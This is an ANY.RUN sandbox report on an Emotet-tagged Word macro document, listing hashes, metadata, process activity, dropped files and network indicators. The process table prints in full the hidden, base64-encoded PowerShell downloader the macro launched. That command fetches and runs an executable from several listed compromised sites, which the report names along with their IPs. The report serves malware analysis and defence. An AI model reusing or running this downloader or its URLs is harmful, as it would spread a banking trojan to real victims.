analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

PO# 12062019Ex.doc

Full analysis: https://app.any.run/tasks/2cab728a-1d2f-40d1-a9c6-fe35b2898414
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2019, 21:02:06
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
opendir
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Reiciendis delectus dolorem., Author: Willy Hajek, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 6 19:34:00 2019, Last Saved Time/Date: Fri Dec 6 19:34:00 2019, Number of Pages: 1, Number of Words: 57, Number of Characters: 331, Security: 0
MD5:

46F5051CFF23A79A823600FC5B4DC6DE

SHA1:

783267B75A2FC114321333729AD26C5417B762EA

SHA256:

78355F5D55187AFE5F2A387F26760335409E12A9DBF10CD5D6AB54BD23B1C375

SSDEEP:

3072:OAqfqJPGuS2hvJ2y/GdyuktGDWLS0HZWD5w8K7NkEyD7IBUnLkRoBdB+zxX:OAqfqJPGuS2hx2k4MtGiL3HJkEyD7bn6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 3980)
    • Creates files in the user directory

      • powershell.exe (PID: 3980)
    • Executed via WMI

      • powershell.exe (PID: 3980)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1584)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1584)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3980)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Reiciendis delectus dolorem.
Subject: -
Author: Willy Hajek
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:12:06 19:34:00
ModifyDate: 2019:12:06 19:34:00
Pages: 1
Words: 57
Characters: 331
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 2
Paragraphs: 1
CharCountWithSpaces: 387
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1584"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\PO# 12062019Ex.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3980powershell -w hidden -en JABLAGEAdgB3AGwAcgB6AGgAPQAnAEUAZgBtAHIAZAB3AG4AdQBkAHUAJwA7ACQARwBqAGUAdwB1AGQAbwBoAHAAYwBsAGYAIAA9ACAAJwA0ADEANAAnADsAJABCAGoAegBtAG0AYQBlAGUAZwB0AHUAagB6AD0AJwBOAG8AcwB6AG0AcwByAG8AcQAnADsAJABQAG0AcAB3AHQAegBvAGIAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARwBqAGUAdwB1AGQAbwBoAHAAYwBsAGYAKwAnAC4AZQB4AGUAJwA7ACQAVABvAHEAYwBiAHEAZgBlAD0AJwBNAGUAbgBoAHMAaQB4AG0AcgBoAGUAJwA7ACQAUQBtAHoAawBiAHMAZgBvAGoAcwB4AD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABOAGUAVAAuAFcARQBiAGMATABJAEUATgB0ADsAJABBAHAAcwB0AHgAZABjAHIAdgBqAGsAZAA9ACcAaAB0AHQAcAA6AC8ALwBiAG8AbwB0AHkAYwBhAG0AcABjAGEAcgBkAGkAZgBmAC4AYwBvAG0ALwB4AGQAdwAyAGYALwBtAGsALwAqAGgAdAB0AHAAOgAvAC8AdABvAG0AbwBtAG8AZwBvAGgAYQBuAC4AYwBvAG0ALwBsAGMAdwB1AHkALwBwAGkANgBlAC8AKgBoAHQAdABwADoALwAvAHMAYQBsAGwAeQBhAGMAdQByAHQAaQBzAC4AYgBpAHoALwB3AHAALQBhAGQAbQBpAG4ALwByAG0ALwAqAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQBjAGgAaQByAG8ALgB6AGEALgBuAGUAdAAvAHcAcAAtAGEAZABtAGkAbgAvAGgAdQB1AC8AKgBoAHQAdABwADoALwAvAGMAYQBsAGcAYQByAHkAbQBhAGcAaQBjAHMAaABvAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AbgAyADMALwAnAC4AIgBzAGAAcABMAEkAdAAiACgAJwAqACcAKQA7ACQASABwAGMAbAByAGQAagB1AGkAPQAnAEcAcABuAGUAcgBkAGQAdQB6ACcAOwBmAG8AcgBlAGEAYwBoACgAJABVAGkAbQByAG4AYQB4AGQAZABiAHQAIABpAG4AIAAkAEEAcABzAHQAeABkAGMAcgB2AGoAawBkACkAewB0AHIAeQB7ACQAUQBtAHoAawBiAHMAZgBvAGoAcwB4AC4AIgBkAGAAbwBXAG4ATABgAE8AQQBkAEYAYABJAEwARQAiACgAJABVAGkAbQByAG4AYQB4AGQAZABiAHQALAAgACQAUABtAHAAdwB0AHoAbwBiAHoAKQA7ACQASgBlAHMAdQBqAHQAYwB6AD0AJwBQAGcAagBuAHoAZgBvAGEAawBzAGQAcABmACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAUABtAHAAdwB0AHoAbwBiAHoAKQAuACIAbABgAEUATgBnAHQASAAiACAALQBnAGUAIAAyADAAMAA5ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAEEAYABSAHQAIgAoACQAUABtAHAAdwB0AHoAbwBiAHoAKQA7ACQAVAB1AG8AZQBqAGUAcQBmAGYAeABzAHgAPQAnAFMAagB6AGkAcgBpAGQAcQByAHkAcAAnADsAYgByAGUAYQBrADsAJABaAHgAdQB6AHMAcgBvAGEAaABsAGwAPQAnAFEAZABoAGMAbgByAGcAdgBhAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgB0AHIAYwBkAHAAcABvAHEAcgBoAGwAeAA9ACcARgBwAGwAeQBuAHMAZgBzAGEAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 543
Read events
1 701
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
9

Dropped files

PID
Process
Filename
Type
1584WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR963F.tmp.cvr
MD5:
SHA256:
1584WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DC73092.wmf
MD5:
SHA256:
1584WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EB9A36B.wmf
MD5:
SHA256:
1584WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBFCEE70.wmf
MD5:
SHA256:
1584WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC8BBB1.wmf
MD5:
SHA256:
1584WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E8430DFE.wmf
MD5:
SHA256:
1584WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E0C8E9E7.wmf
MD5:
SHA256:
1584WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EF4EABC.wmf
MD5:
SHA256:
1584WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8452D38D.wmf
MD5:
SHA256:
1584WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6143EC2A.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3980
powershell.exe
GET
404
50.87.253.53:80
http://bootycampcardiff.com/xdw2f/mk/
US
xml
345 b
malicious
3980
powershell.exe
GET
404
162.241.30.19:80
http://sallyacurtis.biz/wp-admin/rm/
US
xml
345 b
malicious
3980
powershell.exe
GET
404
104.28.31.184:80
http://tomomogohan.com/lcwuy/pi6e/
US
xml
345 b
suspicious
3980
powershell.exe
GET
404
50.87.199.155:80
http://calgarymagicshop.com/images/n23/
US
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3980
powershell.exe
50.87.253.53:80
bootycampcardiff.com
Unified Layer
US
malicious
3980
powershell.exe
162.241.30.19:80
sallyacurtis.biz
CyrusOne LLC
US
malicious
3980
powershell.exe
104.28.31.184:80
tomomogohan.com
Cloudflare Inc
US
shared
3980
powershell.exe
69.89.25.199:443
thechiro.za.net
Unified Layer
US
unknown
3980
powershell.exe
50.87.199.155:80
calgarymagicshop.com
Unified Layer
US
suspicious

DNS requests

Domain
IP
Reputation
bootycampcardiff.com
  • 50.87.253.53
malicious
tomomogohan.com
  • 104.28.31.184
  • 104.28.30.184
suspicious
sallyacurtis.biz
  • 162.241.30.19
malicious
thechiro.za.net
  • 69.89.25.199
unknown
calgarymagicshop.com
  • 50.87.199.155
suspicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO Observed DNS Query to .biz TLD
No debug info